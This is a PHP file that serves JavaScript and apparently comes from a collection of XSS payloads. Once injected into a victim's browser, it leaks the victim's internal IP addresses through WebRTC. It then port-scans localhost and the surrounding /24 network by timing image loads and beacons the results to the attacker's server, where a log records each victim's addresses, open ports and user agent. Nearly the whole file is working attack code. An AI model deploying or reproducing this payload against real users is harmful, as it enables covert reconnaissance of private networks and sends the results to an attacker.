xss_payloads/local_network_scan.php

170 lines
5.7 KiB
PHP
Raw Normal View History

<?php
2016-05-18 16:41:46 +00:00
// Get the user's INTERNAL IP address and then attempt to scan their local /24 network
// http://net.ipcalf.com/
// http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html
// Record submitted data. Make sure the web server can write this file
$logfile = "internal_scan.log";
// Log internal IP of the victim
if( !empty($_GET["internalips"]) ){
$line = "ADDR\t".$_SERVER['REMOTE_ADDR']."\t".$_GET["internalips"];
$line .= "\t".$_SERVER["HTTP_USER_AGENT"]."\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
}
// Log an open port
if( !empty( $_GET['openport'] ) ){
$line = "PORT\t".$_SERVER['REMOTE_ADDR']."\t".$_GET["openport"];
if( !empty( $_GET['srcip'] ) ){
$line .= "\t".$_GET['srcip'];
}
$line .= "\t".$_SERVER["HTTP_USER_AGENT"];
$line .= "\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
}
// Report complete
if( !empty( $_GET['scancomplete'] ) ){
$line = "DONE\t".$_SERVER['REMOTE_ADDR'];
if( !empty( $_GET['srcip'] ) ){
$line .= "\t".$_GET['srcip'];
}
$line .= "\t".$_SERVER["HTTP_USER_AGENT"];
$line .= "\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
}
header( "Content-type: text/javascript" );
$url = "//".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
?>
2016-05-18 16:41:46 +00:00
function report( data ){
new Image().src = '<?php echo $url; ?>?'+data;
2016-05-18 16:41:46 +00:00
}
function ports_callback( host, port, state, srcip ){
2016-05-18 16:41:46 +00:00
if( state == "closed" ) return;
// console.log( host, port, state );
report( "openport=" + host + ":" + port + "&srcip=" + srcip );
2016-05-18 16:41:46 +00:00
}
var AttackAPI = {
version: '0.1',
author: 'Petko Petkov (architect)',
homepage: 'http://www.gnucitizen.org'};
AttackAPI.PortScanner = {};
AttackAPI.PortScanner.ports = '445,3389,80,443,3306,8080,1723,5900,1025,8888,199,1720,81,6001'.split(',')
2016-05-18 16:41:46 +00:00
AttackAPI.PortScanner.port_index = 0;
AttackAPI.PortScanner.host_num = 1;
AttackAPI.PortScanner.src = '';
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout, srcip ) {
2016-05-18 16:41:46 +00:00
var timeout = (timeout == null)?100:timeout;
var img = new Image();
// console.log( "Scanning " + target + ":" + port );
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open', srcip );
2016-05-18 16:41:46 +00:00
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img.src = 'http://localhost/icon.png';
2016-05-18 16:41:46 +00:00
img = undefined;
callback(target, port, 'closed', srcip );
2016-05-18 16:41:46 +00:00
}, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
{
var ports = (ports == null) ? AttackAPI.PortScanner.ports : ports;
var timeout = (timeout == null)?100:timeout;
2016-05-18 16:41:46 +00:00
for (index = 0; index < ports.length; index++)
AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout, target );
2016-05-18 16:41:46 +00:00
};
// Scan a /24 around an IP
AttackAPI.PortScanner.scanNetwork = function ( callback, target )
{
if( target.toLowerCase() == 'udp' ) return;
a = target.split('.');
AttackAPI.PortScanner.scanPort( callback, a[0]+'.'+a[1]+'.'+a[2]+'.'+AttackAPI.PortScanner.host_num, AttackAPI.PortScanner.ports[AttackAPI.PortScanner.port_index], 100, target );
2016-05-18 16:41:46 +00:00
AttackAPI.PortScanner.host_num++;
if( AttackAPI.PortScanner.host_num >= 255 ){
AttackAPI.PortScanner.port_index++;
if( AttackAPI.PortScanner.port_index >= AttackAPI.PortScanner.ports.length ){
report( "scancomplete&srcip=" + target );
return;
}
2016-05-18 16:41:46 +00:00
AttackAPI.PortScanner.host_num = 1;
}
setTimeout( function(){
AttackAPI.PortScanner.scanNetwork( callback, target );
}, 200 );
};
// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
if (RTCPeerConnection) (function () {
var rtc = new RTCPeerConnection({iceServers:[]});
if (1 || window.mozRTCPeerConnection) { // FF [and now Chrome!] needs a channel/stream to proceed
rtc.createDataChannel('', {reliable:false});
};
rtc.onicecandidate = function (evt) {
// convert the candidate to SDP so we can run it through our general parser
// see https://twitter.com/lancestout/status/525796175425720320 for details
if (evt.candidate) grepSDP("a="+evt.candidate.candidate);
};
rtc.createOffer(function (offerDesc) {
grepSDP(offerDesc.sdp);
rtc.setLocalDescription(offerDesc);
}, function (e) { console.warn("offer failed", e); });
var addrs = Object.create(null);
addrs["0.0.0.0"] = false;
function updateDisplay(newAddr) {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
displayAddrs = displayAddrs.filter(function(ip){ return ip.toString().trim().toLowerCase() != 'udp';});
report( "internalips=" + displayAddrs.join(',') || 'n/a' );
AttackAPI.PortScanner.scanTarget( ports_callback, '127.0.0.1' );
2016-05-18 16:41:46 +00:00
for( i=0; i<displayAddrs.length; i++ ){
AttackAPI.PortScanner.scanNetwork( ports_callback, displayAddrs[i] );
}
}
function grepSDP(sdp) {
var hosts = [];
sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.13
var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1
addr = parts[4],
type = parts[7];
if (type === 'host') updateDisplay(addr);
var parts = line.split(' '),
addr = parts[2];
updateDisplay(addr);
}
});
}
})(); else {
}